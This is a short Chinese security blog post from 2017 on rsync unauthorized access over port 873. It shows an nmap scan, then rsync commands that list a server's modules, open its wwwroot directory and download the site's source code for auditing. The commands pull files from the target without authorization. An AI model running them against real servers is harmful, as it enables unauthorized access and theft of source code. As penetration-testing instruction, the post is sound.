rsync未授权访问漏洞
2017-09-26 本文已影响0人
Sec小玖
端口号:873
通过nmap 扫描目标开放端口
nmap扫描端口
可以看到873端口开放了rsync服务
rsync ip:: //查看文件目录
目录为wwwroot
rsync ip::wwwroot //进入wwwroot目录
获取wwwroot下目录
rsync -avz ip::wwwroot/目录 /root/本机目录 //下载源码到本地
下载后进行代码审计
-avz下载源代码
nmap扫描端口
目录为wwwroot
获取wwwroot下目录
-avz下载源代码
